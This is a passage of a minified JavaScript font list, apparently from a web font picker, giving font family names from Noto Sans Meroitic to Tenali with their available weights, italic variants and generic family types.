Meroitic",v:[400],f:"sans-serif"},{n:"Noto Sans Miao",v:[400],f:"sans-serif"},{n:"Noto Sans Modi",v:[400],f:"sans-serif"},{n:"Noto Sans Mongolian",v:[400],f:"sans-serif"},{n:"Noto Sans Mono",v:["100","200","300",400,500,600,700,800,900],f:"monospace"},{n:"Noto Sans Mro",v:[400],f:"sans-serif"},{n:"Noto Sans Multani",v:[400],f:"sans-serif"},{n:"Noto Sans Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans NKo",v:[400],f:"sans-serif"},{n:"Noto Sans Nabataean",v:[400],f:"sans-serif"},{n:"Noto Sans New Tai Lue",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Newa",v:[400],f:"sans-serif"},{n:"Noto Sans Nushu",v:[400],f:"sans-serif"},{n:"Noto Sans Ogham",v:[400],f:"sans-serif"},{n:"Noto Sans Ol Chiki",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Old Hungarian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Italic",v:[400],f:"sans-serif"},{n:"Noto Sans Old North Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Permic",v:[400],f:"sans-serif"},{n:"Noto Sans Old Persian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Old South Arabian",v:[400],f:"sans-serif"},{n:"Noto Sans Old Turkic",v:[400],f:"sans-serif"},{n:"Noto Sans Oriya",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Osage",v:[400],f:"sans-serif"},{n:"Noto Sans Osmanya",v:[400],f:"sans-serif"},{n:"Noto Sans Pahawh Hmong",v:[400],f:"sans-serif"},{n:"Noto Sans Palmyrene",v:[400],f:"sans-serif"},{n:"Noto Sans Pau Cin Hau",v:[400],f:"sans-serif"},{n:"Noto Sans Phags Pa",v:[400],f:"sans-serif"},{n:"Noto Sans Phoenician",v:[400],f:"sans-serif"},{n:"Noto Sans Psalter Pahlavi",v:[400],f:"sans-serif"},{n:"Noto Sans Rejang",v:[400],f:"sans-serif"},{n:"Noto Sans Runic",v:[400],f:"sans-serif"},{n:"Noto Sans SC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Samaritan",v:[400],f:"sans-serif"},{n:"Noto Sans Saurashtra",v:[400],f:"sans-serif"},{n:"Noto Sans Sharada",v:[400],f:"sans-serif"},{n:"Noto Sans Shavian",v:[400],f:"sans-serif"},{n:"Noto Sans Siddham",v:[400],f:"sans-serif"},{n:"Noto Sans Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Sogdian",v:[400],f:"sans-serif"},{n:"Noto Sans Sora Sompeng",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Soyombo",v:[400],f:"sans-serif"},{n:"Noto Sans Sundanese",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Syloti Nagri",v:[400],f:"sans-serif"},{n:"Noto Sans Symbols",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Symbols 2",v:[400],f:"sans-serif"},{n:"Noto Sans Syriac",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans TC",v:["100","300",400,500,700,900],f:"sans-serif"},{n:"Noto Sans Tagalog",v:[400],f:"sans-serif"},{n:"Noto Sans Tagbanwa",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Le",v:[400],f:"sans-serif"},{n:"Noto Sans Tai Tham",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Tai Viet",v:[400],f:"sans-serif"},{n:"Noto Sans Takri",v:[400],f:"sans-serif"},{n:"Noto Sans Tamil",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tamil Supplement",v:[400],f:"sans-serif"},{n:"Noto Sans Telugu",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thaana",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Thai Looped",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Tifinagh",v:[400],f:"sans-serif"},{n:"Noto Sans Tirhuta",v:[400],f:"sans-serif"},{n:"Noto Sans Ugaritic",v:[400],f:"sans-serif"},{n:"Noto Sans Vai",v:[400],f:"sans-serif"},{n:"Noto Sans Wancho",v:[400],f:"sans-serif"},{n:"Noto Sans Warang Citi",v:[400],f:"sans-serif"},{n:"Noto Sans Yi",v:[400],f:"sans-serif"},{n:"Noto Sans Zanabazar Square",v:[400],f:"sans-serif"},{n:"Noto Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"Noto Serif Ahom",v:[400],f:"serif"},{n:"Noto Serif Armenian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Balinese",v:[400],f:"serif"},{n:"Noto Serif Bengali",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Devanagari",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Display",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Dogra",v:[400],f:"serif"},{n:"Noto Serif Ethiopic",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Georgian",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Grantha",v:[400],f:"serif"},{n:"Noto Serif Gujarati",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Gurmukhi",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Hebrew",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif JP",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif KR",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Kannada",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Khmer",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Lao",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Malayalam",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Myanmar",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Nyiakeng Puachue Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif SC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Sinhala",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif TC",v:["200","300",400,500,600,700,900],f:"serif"},{n:"Noto Serif Tamil",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Noto Serif Tangut",v:[400],f:"serif"},{n:"Noto Serif Telugu",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Thai",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Tibetan",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Noto Serif Yezidi",v:[400,500,600,700],f:"serif"},{n:"Noto Traditional Nushu",v:[300,400,500,600,700],f:"sans-serif"},{n:"Nova Cut",v:[400],f:"display"},{n:"Nova Flat",v:[400],f:"display"},{n:"Nova Mono",v:[400],f:"monospace"},{n:"Nova Oval",v:[400],f:"display"},{n:"Nova Round",v:[400],f:"display"},{n:"Nova Script",v:[400],f:"display"},{n:"Nova Slim",v:[400],f:"display"},{n:"Nova Square",v:[400],f:"display"},{n:"Numans",v:[400],f:"sans-serif"},{n:"Nunito",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Nunito Sans",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Nabla",v:[400],f:"display"},{n:"Noto Color Emoji",v:[400],f:"sans-serif"},{n:"Noto Sans Chorasmian",v:[400],f:"sans-serif"},{n:"Noto Sans Ethiopic",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Lao Looped",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Noto Sans Mende Kikakui",v:[400],f:"sans-serif"},{n:"Noto Sans Nag Mundari",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Sans Nandinagari",v:[400],f:"sans-serif"},{n:"Noto Sans SignWriting",v:[400],f:"sans-serif"},{n:"Noto Sans Tangsa",v:[400,500,600,700],f:"sans-serif"},{n:"Noto Serif HK",v:[200,300,400,500,600,700,800,900],f:"serif"},{n:"Noto Serif NP Hmong",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Oriya",v:[400,500,600,700],f:"serif"},{n:"Noto Serif Toto",v:[400,500,600,700],f:"serif"},{n:"Nuosu SIL",v:[400],f:"serif"},{n:"Odibee Sans",v:[400],f:"display"},{n:"Odor Mean Chey",v:[400],f:"serif"},{n:"Offside",v:[400],f:"display"},{n:"Oi",v:[400],f:"display"},{n:"Old Standard TT",v:[400,"400i",700],f:"serif"},{n:"Oldenburg",v:[400],f:"display"},{n:"Ole",v:[400],f:"handwriting"},{n:"Oleo Script",v:[400,700],f:"display"},{n:"Oleo Script Swash Caps",v:[400,700],f:"display"},{n:"Oooh Baby",v:[400],f:"handwriting"},{n:"Open Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Oranienbaum",v:[400],f:"serif"},{n:"Orbitron",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Oregano",v:[400,"400i"],f:"display"},{n:"Orelega One",v:[400],f:"display"},{n:"Orienta",v:[400],f:"sans-serif"},{n:"Original Surfer",v:[400],f:"display"},{n:"Oswald",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Outfit",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Over the Rainbow",v:[400],f:"handwriting"},{n:"Overlock",v:[400,"400i",700,"700i",900,"900i"],f:"display"},{n:"Overlock SC",v:[400],f:"display"},{n:"Overpass",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Overpass Mono",v:["300",400,500,600,700],f:"monospace"},{n:"Ovo",v:[400],f:"serif"},{n:"Oxanium",v:["200","300",400,500,600,700,800],f:"display"},{n:"Oxygen",v:["300",400,700],f:"sans-serif"},{n:"Oxygen Mono",v:[400],f:"monospace"},{n:"PT Mono",v:[400],f:"monospace"},{n:"PT Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"PT Sans Caption",v:[400,700],f:"sans-serif"},{n:"PT Sans Narrow",v:[400,700],f:"sans-serif"},{n:"PT Serif",v:[400,"400i",700,"700i"],f:"serif"},{n:"PT Serif Caption",v:[400,"400i"],f:"serif"},{n:"Pacifico",v:[400],f:"handwriting"},{n:"Padauk",v:[400,700],f:"sans-serif"},{n:"Palanquin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"Palanquin Dark",v:[400,500,600,700],f:"sans-serif"},{n:"Pangolin",v:[400],f:"handwriting"},{n:"Paprika",v:[400],f:"display"},{n:"Parisienne",v:[400],f:"handwriting"},{n:"Passero One",v:[400],f:"display"},{n:"Passion One",v:[400,700,900],f:"display"},{n:"Passions Conflict",v:[400],f:"handwriting"},{n:"Pathway Gothic One",v:[400],f:"sans-serif"},{n:"Patrick Hand",v:[400],f:"handwriting"},{n:"Patrick Hand SC",v:[400],f:"handwriting"},{n:"Pattaya",v:[400],f:"sans-serif"},{n:"Patua One",v:[400],f:"display"},{n:"Pavanam",v:[400],f:"sans-serif"},{n:"Paytone One",v:[400],f:"sans-serif"},{n:"Peddana",v:[400],f:"serif"},{n:"Peralta",v:[400],f:"display"},{n:"Permanent Marker",v:[400],f:"handwriting"},{n:"Petemoss",v:[400],f:"handwriting"},{n:"Petit Formal Script",v:[400],f:"handwriting"},{n:"Petrona",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Philosopher",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Piazzolla",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Piedra",v:[400],f:"display"},{n:"Pinyon Script",v:[400],f:"handwriting"},{n:"Pirata One",v:[400],f:"display"},{n:"Plaster",v:[400],f:"display"},{n:"Play",v:[400,700],f:"sans-serif"},{n:"Playball",v:[400],f:"display"},{n:"Playfair Display",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Playfair Display SC",v:[400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Plus Jakarta Sans",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Podkova",v:[400,500,600,700,800],f:"serif"},{n:"Poiret One",v:[400],f:"display"},{n:"Poller One",v:[400],f:"display"},{n:"Poly",v:[400,"400i"],f:"serif"},{n:"Pompiere",v:[400],f:"display"},{n:"Pontano Sans",v:[300,400,500,600,700],f:"sans-serif"},{n:"Poor Story",v:[400],f:"display"},{n:"Poppins",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Port Lligat Sans",v:[400],f:"sans-serif"},{n:"Port Lligat Slab",v:[400],f:"serif"},{n:"Potta One",v:[400],f:"display"},{n:"Pragati Narrow",v:[400,700],f:"sans-serif"},{n:"Praise",v:[400],f:"handwriting"},{n:"Prata",v:[400],f:"serif"},{n:"Preahvihear",v:[400],f:"sans-serif"},{n:"Press Start 2P",v:[400],f:"display"},{n:"Pridi",v:["200","300",400,500,600,700],f:"serif"},{n:"Princess Sofia",v:[400],f:"handwriting"},{n:"Prociono",v:[400],f:"serif"},{n:"Prompt",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Prosto One",v:[400],f:"display"},{n:"Proza Libre",v:[400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Public Sans",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Puppies Play",v:[400],f:"handwriting"},{n:"Puritan",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Purple Purse",v:[400],f:"display"},{n:"Padyakke Expanded One",v:[400],f:"display"},{n:"Pathway Extreme",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Phudu",v:[300,400,500,600,700,800,900],f:"display"},{n:"Playfair",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Poltawski Nowy",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Qahiri",v:[400],f:"sans-serif"},{n:"Quando",v:[400],f:"serif"},{n:"Quantico",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Quattrocento",v:[400,700],f:"serif"},{n:"Quattrocento Sans",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Questrial",v:[400],f:"sans-serif"},{n:"Quicksand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Quintessential",v:[400],f:"handwriting"},{n:"Qwigley",v:[400],f:"handwriting"},{n:"Qwitcher Grypen",v:[400,700],f:"handwriting"},{n:"Racing Sans One",v:[400],f:"display"},{n:"Radio Canada",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Radley",v:[400,"400i"],f:"serif"},{n:"Rajdhani",v:["300",400,500,600,700],f:"sans-serif"},{n:"Rakkas",v:[400],f:"display"},{n:"Raleway",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Raleway Dots",v:[400],f:"display"},{n:"Ramabhadra",v:[400],f:"sans-serif"},{n:"Ramaraja",v:[400],f:"serif"},{n:"Rambla",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Rammetto One",v:[400],f:"display"},{n:"Rampart One",v:[400],f:"display"},{n:"Ranchers",v:[400],f:"display"},{n:"Rancho",v:[400],f:"handwriting"},{n:"Ranga",v:[400,700],f:"display"},{n:"Rasa",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Rationale",v:[400],f:"sans-serif"},{n:"Ravi Prakash",v:[400],f:"display"},{n:"Readex Pro",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Recursive",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"Red Hat Display",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Red Hat Mono",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Red Hat Text",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Red Rose",v:["300",400,500,600,700],f:"display"},{n:"Redacted",v:[400],f:"display"},{n:"Redacted Script",v:["300",400,700],f:"display"},{n:"Redressed",v:[400],f:"handwriting"},{n:"Reem Kufi",v:[400,500,600,700],f:"sans-serif"},{n:"Reenie Beanie",v:[400],f:"handwriting"},{n:"Reggae One",v:[400],f:"display"},{n:"Revalia",v:[400],f:"display"},{n:"Rhodium Libre",v:[400],f:"serif"},{n:"Ribeye",v:[400],f:"display"},{n:"Ribeye Marrow",v:[400],f:"display"},{n:"Righteous",v:[400],f:"display"},{n:"Risque",v:[400],f:"display"},{n:"Road Rage",v:[400],f:"display"},{n:"Roboto",v:["100","100i","300","300i",400,"400i",500,"500i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Roboto Condensed",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Roboto Flex",v:[400],f:"sans-serif"},{n:"Roboto Mono",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"monospace"},{n:"Roboto Serif",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Roboto Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Rochester",v:[400],f:"handwriting"},{n:"Rock Salt",v:[400],f:"handwriting"},{n:"RocknRoll One",v:[400],f:"sans-serif"},{n:"Rokkitt",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Romanesco",v:[400],f:"handwriting"},{n:"Ropa Sans",v:[400,"400i"],f:"sans-serif"},{n:"Rosario",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Rosarivo",v:[400,"400i"],f:"serif"},{n:"Rouge Script",v:[400],f:"handwriting"},{n:"Rowdies",v:["300",400,700],f:"display"},{n:"Rozha One",v:[400],f:"serif"},{n:"Rubik",v:["300",400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Rubik Beastly",v:[400],f:"display"},{n:"Rubik Bubbles",v:[400],f:"display"},{n:"Rubik Glitch",v:[400],f:"display"},{n:"Rubik Microbe",v:[400],f:"display"},{n:"Rubik Mono One",v:[400],f:"sans-serif"},{n:"Rubik Moonrocks",v:[400],f:"display"},{n:"Rubik Puddles",v:[400],f:"display"},{n:"Rubik Wet Paint",v:[400],f:"display"},{n:"Ruda",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Rufina",v:[400,700],f:"serif"},{n:"Ruge Boogie",v:[400],f:"handwriting"},{n:"Ruluko",v:[400],f:"sans-serif"},{n:"Rum Raisin",v:[400],f:"sans-serif"},{n:"Ruslan Display",v:[400],f:"display"},{n:"Russo One",v:[400],f:"sans-serif"},{n:"Ruthie",v:[400],f:"handwriting"},{n:"Rye",v:[400],f:"display"},{n:"Reem Kufi Fun",v:[400,500,600,700],f:"sans-serif"},{n:"Reem Kufi Ink",v:[400],f:"sans-serif"},{n:"Rubik 80s Fade",v:[400],f:"display"},{n:"Rubik Burned",v:[400],f:"display"},{n:"Rubik Dirt",v:[400],f:"display"},{n:"Rubik Distressed",v:[400],f:"display"},{n:"Rubik Gemstones",v:[400],f:"display"},{n:"Rubik Iso",v:[400],f:"display"},{n:"Rubik Marker Hatch",v:[400],f:"display"},{n:"Rubik Maze",v:[400],f:"display"},{n:"Rubik Pixels",v:[400],f:"display"},{n:"Rubik Spray Paint",v:[400],f:"display"},{n:"Rubik Storm",v:[400],f:"display"},{n:"Rubik Vinyl",v:[400],f:"display"},{n:"STIX Two Text",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Sacramento",v:[400],f:"handwriting"},{n:"Sahitya",v:[400,700],f:"serif"},{n:"Sail",v:[400],f:"display"},{n:"Saira",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Saira Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Extra Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Saira Stencil One",v:[400],f:"display"},{n:"Salsa",v:[400],f:"display"},{n:"Sanchez",v:[400,"400i"],f:"serif"},{n:"Sancreek",v:[400],f:"display"},{n:"Sansita",v:[400,"400i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Sansita Swashed",v:["300",400,500,600,700,800,900],f:"display"},{n:"Sarabun",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Sarala",v:[400,700],f:"sans-serif"},{n:"Sarina",v:[400],f:"display"},{n:"Sarpanch",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Sassy Frass",v:[400],f:"handwriting"},{n:"Satisfy",v:[400],f:"handwriting"},{n:"Sawarabi Gothic",v:[400],f:"sans-serif"},{n:"Sawarabi Mincho",v:[400],f:"serif"},{n:"Scada",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Scheherazade New",v:[400,500,600,700],f:"serif"},{n:"Schoolbell",v:[400],f:"handwriting"},{n:"Scope One",v:[400],f:"serif"},{n:"Seaweed Script",v:[400],f:"display"},{n:"Secular One",v:[400],f:"sans-serif"},{n:"Sedgwick Ave",v:[400],f:"handwriting"},{n:"Sedgwick Ave Display",v:[400],f:"handwriting"},{n:"Sen",v:[400,700,800],f:"sans-serif"},{n:"Send Flowers",v:[400],f:"handwriting"},{n:"Sevillana",v:[400],f:"display"},{n:"Seymour One",v:[400],f:"sans-serif"},{n:"Shadows Into Light",v:[400],f:"handwriting"},{n:"Shadows Into Light Two",v:[400],f:"handwriting"},{n:"Shalimar",v:[400],f:"handwriting"},{n:"Shanti",v:[400],f:"sans-serif"},{n:"Share",v:[400,"400i",700,"700i"],f:"display"},{n:"Share Tech",v:[400],f:"sans-serif"},{n:"Share Tech Mono",v:[400],f:"monospace"},{n:"Shippori Antique",v:[400],f:"sans-serif"},{n:"Shippori Antique B1",v:[400],f:"sans-serif"},{n:"Shippori Mincho",v:[400,500,600,700,800],f:"serif"},{n:"Shippori Mincho B1",v:[400,500,600,700,800],f:"serif"},{n:"Shojumaru",v:[400],f:"display"},{n:"Short Stack",v:[400],f:"handwriting"},{n:"Shrikhand",v:[400],f:"display"},{n:"Siemreap",v:[400],f:"display"},{n:"Sigmar One",v:[400],f:"display"},{n:"Signika",v:["300",400,500,600,700],f:"sans-serif"},{n:"Signika Negative",v:["300",400,500,600,700],f:"sans-serif"},{n:"Simonetta",v:[400,"400i",900,"900i"],f:"display"},{n:"Single Day",v:[400],f:"display"},{n:"Sintony",v:[400,700],f:"sans-serif"},{n:"Sirin Stencil",v:[400],f:"display"},{n:"Six Caps",v:[400],f:"sans-serif"},{n:"Skranji",v:[400,700],f:"display"},{n:"Slabo 13px",v:[400],f:"serif"},{n:"Slabo 27px",v:[400],f:"serif"},{n:"Slackey",v:[400],f:"display"},{n:"Smokum",v:[400],f:"display"},{n:"Smooch",v:[400],f:"handwriting"},{n:"Smooch Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Smythe",v:[400],f:"display"},{n:"Sniglet",v:[400,800],f:"display"},{n:"Snippet",v:[400],f:"sans-serif"},{n:"Snowburst One",v:[400],f:"display"},{n:"Sofadi One",v:[400],f:"display"},{n:"Sofia",v:[400],f:"handwriting"},{n:"Solway",v:["300",400,500,700,800],f:"serif"},{n:"Song Myung",v:[400],f:"serif"},{n:"Sonsie One",v:[400],f:"display"},{n:"Sora",v:["100","200","300",400,500,600,700,800],f:"sans-serif"},{n:"Sorts Mill Goudy",v:[400,"400i"],f:"serif"},{n:"Source Code Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Source Sans 3",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Source Sans Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Source Serif 4",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Source Serif Pro",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i",900,"900i"],f:"serif"},{n:"Space Grotesk",v:["300",400,500,600,700],f:"sans-serif"},{n:"Space Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Special Elite",v:[400],f:"display"},{n:"Spectral",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spectral SC",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"serif"},{n:"Spicy Rice",v:[400],f:"display"},{n:"Spinnaker",v:[400],f:"sans-serif"},{n:"Spirax",v:[400],f:"display"},{n:"Spline Sans",v:["300",400,500,600,700],f:"sans-serif"},{n:"Squada One",v:[400],f:"display"},{n:"Square Peg",v:[400],f:"handwriting"},{n:"Sree Krushnadevaraya",v:[400],f:"serif"},{n:"Sriracha",v:[400],f:"handwriting"},{n:"Srisakdi",v:[400,700],f:"display"},{n:"Staatliches",v:[400],f:"display"},{n:"Stalemate",v:[400],f:"handwriting"},{n:"Stalinist One",v:[400],f:"display"},{n:"Stardos Stencil",v:[400,700],f:"display"},{n:"Stick",v:[400],f:"sans-serif"},{n:"Stick No Bills",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Stint Ultra Condensed",v:[400],f:"display"},{n:"Stint Ultra Expanded",v:[400],f:"display"},{n:"Stoke",v:["300",400],f:"serif"},{n:"Strait",v:[400],f:"sans-serif"},{n:"Style Script",v:[400],f:"handwriting"},{n:"Stylish",v:[400],f:"sans-serif"},{n:"Sue Ellen Francisco",v:[400],f:"handwriting"},{n:"Suez One",v:[400],f:"serif"},{n:"Sulphur Point",v:["300",400,700],f:"sans-serif"},{n:"Sumana",v:[400,700],f:"serif"},{n:"Sunflower",v:["300",500,700],f:"sans-serif"},{n:"Sunshiney",v:[400],f:"handwriting"},{n:"Supermercado One",v:[400],f:"display"},{n:"Sura",v:[400,700],f:"serif"},{n:"Suranna",v:[400],f:"serif"},{n:"Suravaram",v:[400],f:"serif"},{n:"Suwannaphum",v:["100","300",400,700,900],f:"serif"},{n:"Swanky and Moo Moo",v:[400],f:"handwriting"},{n:"Syncopate",v:[400,700],f:"sans-serif"},{n:"Syne",v:[400,500,600,700,800],f:"sans-serif"},{n:"Syne Mono",v:[400],f:"monospace"},{n:"Syne Tactile",v:[400],f:"display"},{n:"Schibsted Grotesk",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Shantell Sans",v:[300,400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"display"},{n:"Sigmar",v:[400],f:"display"},{n:"Silkscreen",v:[400,700],f:"display"},{n:"Slackside One",v:[400],f:"handwriting"},{n:"Sofia Sans",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Extra Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Sofia Sans Semi Condensed",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Solitreo",v:[400],f:"handwriting"},{n:"Sono",v:[200,300,400,500,600,700,800],f:"sans-serif"},{n:"Splash",v:[400],f:"handwriting"},{n:"Spline Sans Mono",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"monospace"},{n:"Tajawal",v:["200","300",400,500,700,800,900],f:"sans-serif"},{n:"Tangerine",v:[400,700],f:"handwriting"},{n:"Tapestry",v:[400],f:"handwriting"},{n:"Taprom",v:[400],f:"display"},{n:"Tauri",v:[400],f:"sans-serif"},{n:"Taviraj",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Teko",v:["300",400,500,600,700],f:"sans-serif"},{n:"Telex",v:[400],f:"sans-serif"},{n:"Tenali 